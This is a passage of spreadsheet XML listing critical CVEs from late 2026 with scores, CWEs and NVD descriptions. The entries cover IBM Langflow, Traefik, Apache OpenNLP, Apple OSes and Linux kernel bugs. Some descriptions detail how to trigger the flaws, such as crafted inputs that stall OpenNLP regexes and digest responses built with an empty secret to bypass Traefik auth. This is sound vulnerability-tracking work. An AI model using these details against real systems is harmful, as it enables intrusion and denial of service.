        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>ibm:contextforge</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway 1.0.0 through 1.0.7 could allow a remote attacker to gain administrative access due to the use of default credentials.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78573</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79724</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary OS commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79724</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81204</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary code due to code injection during graph construction.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81204</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81467</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.038</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81467</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82617</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>The two built-in name-finder patterns exposed by
opennlp.tools.namefind.RegexNameFinderFactory - DEFAULT_REGEX_NAME_FINDER.EMAIL
and DEFAULT_REGEX_NAME_FINDER.URL - contain ambiguous nested quantifiers. An
application that obtains these finders through
RegexNameFinderFactory.getDefaultRegexNameFinders(...) and then applies them to
untrusted text through RegexNameFinder.find(String[]) or RegexNameFinder.find(String)
can be driven into super-linear backtracking or into unbounded matcher recursion by a
small crafted input.
For the EMAIL pattern, a long run of local-part characters that is never followed by an
@ forces the matcher to re-scan to end-of-input from every starting offset. Cost grows
quadratically with input length: an input of approximately 32 KB consumes several seconds
of CPU in a single find() call and returns no match, and each doubling of the input
multiplies the cost roughly four-fold.
For the URL pattern, the query-string sub-expression nests a capturing repetition inside
an outer repetition. The JDK matcher recurses once per query token, so an input of
approximately 4 KB containing many &amp;-separated tokens exhausts the thread stack and
causes java.lang.StackOverflowError to propagate out of find(), terminating the
calling thread. On a thread created with a smaller stack (for example -Xss512k, typical
of server worker pools) approximately 1 KB is sufficient.
In both cases an attacker who can supply text for analysis can convert a single request
into seconds to minutes of pinned CPU, or into an abrupt thread death, denying service to
the embedding application. No authentication, special configuration, or model file is
required beyond the application having selected one of the two built-in finders.
This issue affects Apache OpenNLP: from 2.0.0 through 2.5.11; from 3.0.0-M1 through
3.0.0-M5.
Users are recommended to upgrade to version 2.5.12, or to 3.0.0-M6 for users tracking the
3.0.0 milestone line, which fix the issue.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82617</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84520</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved size validation. This issue is fixed in macOS Golden Gate 27. A local attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84520</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84561</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>A double free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84561</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84609</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved path validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to modify protected system files.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84609</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85594</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Traefik versions from v3.7.1 fail to enforce crossProviderNamespaces restrictions on the traefik.ingress.kubernetes.io/service.middlewares Service annotation in the Kubernetes Ingress provider. A namespace-limited tenant excluded from the allowlist can attach an operator-owned middleware to its Service, and if that middleware injects backend credentials, recover them at a controlled backend.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85594</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85595</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>Traefik versions before v2.11.55 and versions v3.0.0 through v3.7.10 contain an authentication bypass vulnerability in the digestAuth middleware where unknown usernames receive an empty secret instead of rejection. Attackers can compute a valid digest response using the empty secret and arbitrary credentials to bypass authentication on any digestAuth-protected route without a valid username or password.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85595</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85596</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.10 contain an authentication bypass in the Kubernetes Ingress NGINX provider. The TLS option generated for an Ingress carrying the nginx.ingress.kubernetes.io/auth-tls-secret annotation was named after the Ingress namespace and name. As a result, two Ingress objects sharing the same host, the same client CA secret, and the same client-authentication mode produced two distinct TLS option names for that host. Traefik treats this as a TLS options conflict and falls back to the entry point's default TLS configuration, which does not request a client certificate, so a route configured with nginx.ingress.kubernetes.io/auth-tls-verify-client: "on" becomes reachable without a client certificate. Only the v3.7 line is affected; the issue is fixed in v3.7.11.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85596</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89778</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
isofs: fix out-of-bounds page array access on empty zisofs block
zisofs_uncompress_block()'s empty-block fast path returns
pcount &lt;&lt; PAGE_SHIFT, ignoring the incoming poffset, unlike the
decompression path which returns bytes produced relative to poffset.
zisofs_fill_pages() uses that return to advance its page cursor, so when
the zisofs block size is below PAGE_SIZE and a sub-page block leaves
poffset partway into a page, a following empty block over-counts and
advances pages[] one element past its end, after which
"if (poffset &amp;&amp; *pages)" reads pages[1] out of bounds.  rock.c only
rejects a block-size shift &gt; 17, so a crafted "ZF" Rock Ridge record can
set it below PAGE_SHIFT; the bug is reached by an ordinary read() of a
compressed file on such a mounted ISO9660 image.
Return the byte count relative to poffset and zero only
[poffset, PAGE_SIZE) of the first page, matching the decompression path.
The page-aligned case (poffset == 0) is unaffected.
  BUG: KASAN: slab-out-of-bounds in zisofs_read_folio (fs/isofs/compress.c:290)
  Read of size 8 at addr ffff88800f5eac48 by task exploit/142
   zisofs_read_folio (fs/isofs/compress.c:290)
   read_pages (mm/readahead.c:184)
   ...
   filemap_read (mm/filemap.c:2814)
   vfs_read (fs/read_write.c:574)
   __x64_sys_pread64 (fs/read_write.c:769)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
  The buggy address is located 0 bytes to the right of the
  allocated 8-byte region in the kmalloc-8 cache</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89778</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89783</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfrm6: fix out-of-bounds write in xfrm6_input_addr() when secpath is full
The depth check in xfrm6_input_addr() is off by one:
  if (1 + sp-&gt;len == XFRM_MAX_DEPTH)
          goto drop;
  ...
  sp-&gt;xvec[sp-&gt;len++] = x;
xfrm_input() can leave sp-&gt;len == XFRM_MAX_DEPTH, and the transport-mode
receive path re-enters IPv6 input via xfrm_trans_reinject() with that
secpath preserved. If the inner packet carries a destination-options HAO
option or a type-2 routing header, xfrm6_input_addr() is called with
sp-&gt;len == XFRM_MAX_DEPTH; the check (1 + 6 == 6) is false, so
sp-&gt;xvec[sp-&gt;len++] writes one slot past the 6-element xvec[]. The write
stays within the sec_path allocation (invisible to KASAN); UBSAN_BOUNDS
flags it and panics under panic_on_warn.
Use "sp-&gt;len &gt;= XFRM_MAX_DEPTH", matching xfrm_input(). This also
restores one chain level the old check rejected at sp-&gt;len == 5.
  UBSAN: array-index-out-of-bounds in net/ipv6/xfrm6_input.c:309:10
  index 6 is out of range for type 'xfrm_state *[6]'</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89783</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89788</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix tree connection use-after-free in smb2_tree_connect()
ksmbd_tree_conn_connect() publishes a new tree connection in
sess-&gt;tree_conns with a single reference and returns its pointer to
smb2_tree_connect(). The handler continues to initialize the object and
build the response after publication. A concurrent session logoff can
erase the connection and drop that reference, freeing the object while
the handler still uses it.
BUG: KASAN: slab-use-after-free in smb2_tree_connect+0xe3d/0xf90
  smb2_tree_connect (fs/smb/server/smb2pdu.c:2872)
  handle_ksmbd_work
  process_one_work
  worker_thread
  kthread
After xa_store() succeeds, take a second reference before releasing
tree_conns_lock. The original reference belongs to the xarray entry and
the second belongs to the creating smb2_tree_connect() handler.
Keep the references balanced in every path:
- On normal exit or an error after publication, smb2_tree_connect()
  drops its creator reference. Error cleanup also calls
  ksmbd_tree_conn_disconnect(), which drops the xarray reference only if
  it removes the exact entry.
- SMB2 TREE_DISCONNECT uses the same helper to remove the entry and drop
  its xarray reference. The request's existing lookup reference remains
  owned by the request and is released by the existing cleanup.
- Session LOGOFF removes each entry and drops its xarray reference. If
  it wins the race, later cleanup sees that the entry is gone and does
  not drop that reference again.
To enforce this ownership, claim the disconnected state and erase the
exact entry atomically under tree_conns_lock. This guarantees one drop
for the xarray reference and one drop by each in-flight user, regardless
of which teardown path wins. If logoff removes the entry before
initialization completes, fail the connect instead of marking the
detached object TREE_CONNECTED.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89788</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89847</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
